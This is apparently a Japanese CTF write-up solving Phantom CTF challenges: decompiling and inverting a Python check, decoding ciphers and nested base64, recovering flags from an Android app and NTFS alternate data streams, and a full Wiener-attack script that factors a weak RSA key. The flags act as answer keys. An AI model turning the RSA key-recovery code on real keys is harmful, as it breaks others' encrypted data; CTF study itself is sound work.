0x7fff8f6e0438 | 66 6c 61 67 00 ff ff ff | 0x7fff8f6e0440 | 50 04 6e 8f ff 7f 00 00 | 0x7fff8f6e0448 | 44 33 84 c9 f2 55 00 00 | You did it! You breaked locker 2 pCTF{U_br34k3d_L0CK3R_c0ngr4ts}
pCTF{U_br34k3d_L0CK3R_c0ngr4ts}
Secret (Reverse Engineering)
pycをデコンパイルする。
$ uncompyle6 s3cr3t.pyc # uncompyle6 version 3.6.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.6.10 (default, Dec 19 2019, 23:04:32) # [GCC 5.4.0 20160609] # Embedded file name: source.py # Size of source mod 2**32: 741 bytes def kraitrot(input, d): Lf = input[0:d] Ls = input[d:] return Ls + Lf def cobraverse(s): g = '' g += s[1::2] g += s[0::2] return g def vipershift(s): g = '' for i in range(len(s)): a = hex(ord(s[i]) + 20)[2:] g += a return g s3rc3t = input("Enter the secret to get access to python's cave : ") if len(s3rc3t) < 28: print('Add little more weight :::\n') else: if vipershift(cobraverse(kraitrot(s3rc3t, 15))) == '867387738d7c8284688f454745737c4488894784884491575a807a738787': print("\nWhy does Python live on land?\nBecause it's above C-level . XD!! \nCongrats for the flag anyways") else: print('Maybe a python bit you , better luck next time :((') # okay decompiling s3cr3t.pyc
変換処理は以下の通り。
・15バイトで区切り、入れ替える。 ・奇数番目の結合+偶数番目の結合にする。 ・ASCIIコードで20足して、16進数にする。
それほど難しい変換ではないので、普通に逆算していく。
def rev_vipershift(s): g = '' for i in range(0, len(s), 2): g += chr(int(s[i:i+2], 16) - 20) return g def rev_cobraverse(s): g = '' for i in range(len(s)//2): g += s[i + len(s)//2] g += s[i] return g def rev_kraitrot(input, d): Lf = input[0:len(input) - d] Ls = input[len(input) - d:] return Ls + Lf enc = '867387738d7c8284688f454745737c4488894784884491575a807a738787' flag = rev_kraitrot(rev_cobraverse(rev_vipershift(enc)), 15) print flag
pCTF{l1f3_1s_sh0rt_us3_pyth0n}
Welcome Note (Crypto)
https://www.pinterest.jp/pin/426364289721580301/
このハイリア文字の変換テーブルを参考に復号する。
CYBSEC W31C0ME5 YOU T0 TH3 PH4N7OM C7F 3.O
pCTF{CYBSEC_W31C0ME5_YOU_T0_TH3_PH4N7OM_C7F_3.O}
Irritate (Misc)
with open('irritate', 'r') as f: data = f.read() while True: try: data = data.decode('base64') except: break print data
pCTF{1s_it_5t1ll_h4ck4ble}
RSAXYZ (Crypto)
eの値が大きいので、Wiener Attackで復号する。
from Crypto.PublicKey import RSA from Crypto.Util.number import * from fractions import Fraction def egcd(a, b): x,y, u,v = 0,1, 1,0 while a != 0: q, r = b//a, b%a m, n = x-u*q, y-v*q b,a, x,y, u,v = a,r, u,v, m,n gcd = b return gcd, x, y def decrypt(p, q, e, c): n = p * q phi = (p - 1) * (q - 1) gcd, a, b = egcd(e, phi) d = a pt = pow(c, d, n) return hex(pt)[2:-1].decode('hex') def continued_fractions(n,e): cf = [0] while e != 0: cf.append(int(n/e)) N = n n = e e = N%e return cf def calcKD(cf): kd = list() for i in range(1,len(cf)+1): tmp = Fraction(0) for j in cf[1:i][::-1]: tmp = 1/(tmp+j) kd.append((tmp.numerator,tmp.denominator)) return kd def int_sqrt(n): def f(prev): while True: m = (prev + n/prev)/2 if m >= prev: return prev prev = m return f(n) def calcPQ(a,b): if a*a < 4*b or a < 0: return None c = int_sqrt(a*a-4*b) p = (a + c) /2 q = (a - c) /2 if p + q == a and p * q == b: return (p,q) else: return None def wiener(n,e): kd = calcKD(continued_fractions(n,e)) for (k,d) in kd: if k == 0: continue if (e*d-1) % k != 0: continue phin = (e*d-1) / k if phin >= n: continue ans = calcPQ(n-phin+1,n) if ans is None: continue return (ans[0],ans[1]) with open('key.public', 'r') as f: pub_data = f.read() pubkey = RSA.importKey(pub_data) n = pubkey.n e = pubkey.e with open('ciphertext.bin', 'rb') as f: c = bytes_to_long(f.read()) p, q = wiener(n, e) flag = decrypt(p, q, e, c) print flag
復号結果は以下の通り。
{shorter_d_is_quicker_but_insecure}
pCTF{shorter_d_is_quicker_but_insecure}
Click ME (Android)
Bytecode Viewerで見てみる。
class MainActivity$1 implements OnClickListener { // $FF: synthetic field final MainActivity this$0; MainActivity$1(MainActivity var1) { this.this$0 = var1; } public void onClick(View var1) { MainActivity var2 = this.this$0; ++var2.count; this.this$0.atextview.setText("click it 10000 times for flag"); if (this.this$0.count == 10000) { String var3 = new String(Base64.decode("cENURns3aHIwd180YVBwbDNfZnIwbV93MW5Eb1d9", 0), StandardCharsets.UTF_8); this.this$0.atextview.setText(var3); } } }
$ echo cENURns3aHIwd180YVBwbDNfZnIwbV93MW5Eb1d9 | base64 -d pCTF{7hr0w_4aPpl3_fr0m_w1nDoW}
pCTF{7hr0w_4aPpl3_fr0m_w1nDoW}
0 kb (Misc)
>dir /r ドライブ C のボリューム ラベルは S3A8244D001 です ボリューム シリアル番号は 50D2-38C8 です C:\CTF\work のディレクトリ 2020/08/22 11:56 <DIR> . 2020/08/22 11:56 <DIR> .. 2020/08/22 11:54 154 modibaba.rar 149 modibaba.rar:Zone.Identifier:$DATA 2020/08/14 01:29 0 modibaba.txt 30 modibaba.txt:hidden:$DATA 2 個のファイル 154 バイト 2 個のディレクトリ 593,076,920,320 バイトの空き領域
代替データストリームが入っている。
>more < modibaba.txt:hidden:$DATA flag{baba_jika_thullu_flag}
flag{baba_jika_thullu_flag}